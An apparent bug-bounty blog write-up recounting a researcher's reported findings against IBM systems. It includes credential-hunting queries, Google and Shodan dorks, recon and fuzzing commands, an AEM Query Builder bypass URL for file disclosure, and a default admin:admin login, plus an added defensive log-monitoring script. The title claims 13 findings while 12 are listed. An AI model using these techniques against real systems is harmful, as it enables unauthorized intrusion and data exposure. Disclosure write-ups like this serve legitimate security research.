How I Got 1st Place in IBM Top Hackers 2025: Exposing 13 Vulnerabilities (Step-by-Step Guide)
Introduction
In 2025, I uncovered 13 vulnerabilities in IBM’s systems, securing the #1 place in IBM Top Hackers. This guide breaks down my methodology, tools, and mindset. No fluff, just actionable steps.
Scope & Strategy
IBM’s HackerOne program has received 4,440+ reports since 2018. To stand out, I focused on:
- Creativity: Targeting overlooked attack surfaces.
- Persistence: Reporting duplicates until unique flaws emerged.
Vulnerability #1-3: Exposed Secrets
Leaked IBM Cloud Keys via grep.app
I hunted for credentials in public code repositories:
grep.app search:
```
"ibm_cloud_token"
```
searchcode.com query:
```
"password = 'ibm'"
```
Results:
- AWS keys
- IBM Cloud tokens
These reports were marked as duplicates.
Vulnerability #4-5: Slack Workspace Hijacking
Joining IBM Internal Meetings via Google Dorks
I used the following Google dorks:
```
site:ibm.com "slack.com"
site:join.slack.com "ibm"
```
Exploit:
- Accessed a public Slack URL and joined live meetings.
Vulnerability #6: Waymore + JS Analysis
3.8M URLs Scraped in 1 Hour, Leading to Exposed Configuration Files
I ran the following commands:
```
waymore -i ibm.com -mode U -oU waymore-ibm.txt
cat waymore-ibm.txt | grep ".js" | httpx -mc 200 -o live-js.txt
```
Findings:
- Database credentials in a `.conf` file (marked as a duplicate)
- `env.sh` leaking system configuration (triaged)
Vulnerability #7-8: AEM Exploit Chain
Outdated AEM Instance = LFI + Unauthenticated Access
Shodan Dork:
```
ssl:"IBM" http.title:"Adobe Experience Manager"
```
- AEM Query Builder LFI
Run Nuclei:
```
nuclei -u https://52.118.x.x:xxxx -tags aem
```
which found this URL:
```
https://52.118.x.x:xxxx/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1
```
This endpoint is vulnerable to LFI and can read internal files or paths: the `path` parameter can be changed to any path on the system. By fuzzing the parameter I found more paths (`apps`, `system`, `config`, `etc`, `home`, `var`, `tmp`).
I reported it and it was triaged.
Unauthenticated access to Namespace Editor:
Fuzzing revealed an unsecured endpoint:
```
ffuf -u https://52.118.x.x:xxxx/FUZZ -w aem-list.txt -mc 200
```
Endpoint found:
```
/crx/explorer/ui/namespace_editor.jsp
```
Impact
- Unauthorized modifications to AEM namespaces.
I reported it and it was resolved.
Vulnerability #9: WSO2 Dashboard Takeover
Access to admin panel via Default Credentials
WSO2 Identity Server provides authentication, authorization, and user management for applications and services.
Shodan Dork:
```
ssl:IBM http.title:"WSO2 Identity Server"
```
Exploit:
- Logged in with `admin:admin` and accessed user management controls.
I reported it and it was resolved.
Vulnerability #10: Apache Server-Status Leak
Public Apache Server Status Exposed
The Apache `server-status` page provides a web-based interface for monitoring server performance and activity.
Automating the subdomain check with Python:
I wrote the following Python script, which appends `/server-status` to every subdomain in a list:
```python
# Read one subdomain per line and emit the corresponding /server-status URL.
with open("subdomains.txt", "r") as file:
    subdomains = file.readlines()

with open("subdomains_with_status.txt", "w") as file:
    for subdomain in subdomains:
        host = subdomain.strip()
        if host:  # skip blank lines
            file.write(host + "/server-status\n")
```
Impact
- Exposed IPs, request logs, and session data
I reported it and it was marked as a duplicate.
Vulnerability #11: Grafana Metrics Exposure
Unauthenticated Access to Grafana /metrics
The `/metrics` endpoint of a Grafana instance typically exposes time-series data collected from various sources.
Shodan Dork
```
ssl:"IBM" http.title:"Grafana"
```
Exploit:
- Append `/metrics` to the URL and the endpoint is accessible without authentication.
I reported it and it was resolved.
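As a defender-side counterpart to findings #10 and #11 (and the AEM endpoints in #7-8), here is an added example, not code from the original post, that parses constructed Apache access-log lines and flags successful requests to those operational endpoints from clients outside an assumed trusted-network allowlist. The sample addresses (RFC 5737 documentation ranges), the allowlist and the endpoint list are assumptions for illustration.

```python
import ipaddress
import re

# Constructed sample lines in Apache combined log format. Client addresses use the
# RFC 5737 documentation ranges and do not refer to any real host.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Mar/2025:12:00:01 +0000] "GET /server-status HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2025:12:00:05 +0000] "GET /server-status?auto HTTP/1.1" 200 4870 "-" "python-requests/2.31"
198.51.100.23 - - [10/Mar/2025:12:01:10 +0000] "GET /metrics HTTP/1.1" 200 91233 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2025:12:02:00 +0000] "GET /metrics HTTP/1.1" 200 91233 "-" "Prometheus/2.45"
203.0.113.7 - - [10/Mar/2025:12:03:00 +0000] "GET /bin/querybuilder.json HTTP/1.1" 403 221 "-" "curl/8.0"
203.0.113.9 - - [10/Mar/2025:12:04:00 +0000] "GET /index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Operational endpoints from the write-up that should not answer 2xx to arbitrary clients.
SENSITIVE_PREFIXES = ("/server-status", "/metrics", "/bin/querybuilder.json", "/crx/")

# Assumed trusted monitoring networks (loopback and RFC 1918); adjust to your environment.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in
                ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Combined log format: client, ident, user, [timestamp], "METHOD PATH PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_external(ip: str) -> bool:
    """True when the client address falls outside every trusted network."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in TRUSTED_NETS)


def find_exposures(log_text: str) -> list[dict]:
    """Return successful (2xx) requests to sensitive endpoints made by external clients."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production job would count these separately
        path = m.group("path").split("?", 1)[0]  # drop the query string before matching
        status = int(m.group("status"))
        if path.startswith(SENSITIVE_PREFIXES) and 200 <= status < 300 and is_external(m.group("ip")):
            findings.append({"ip": m.group("ip"), "path": path, "status": status})
    return findings


if __name__ == "__main__":
    for f in find_exposures(SAMPLE_LOG):
        print(f"ALERT external client {f['ip']} fetched {f['path']} (HTTP {f['status']})")
```

Only two of the six constructed lines are flagged: the loopback and RFC 1918 clients are trusted, and the 403 to the AEM endpoint shows the access control working, so a 2xx from an external address is the signal to alert on.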
Vulnerability #12: NTLM Hash Decoding
IBM Internal Network Leak via NTLM
Hashes are decoded using Burp Suite’s SSP Decoder, exposing sensitive authentication data.
Exploit:
- Intercepted NTLM requests and decoded the hashes using Burp Suite’s SSP Decoder.
I reported it and it was marked as a duplicate.
Congratulations 👏🏻, epic job. Thanks for a great writeup.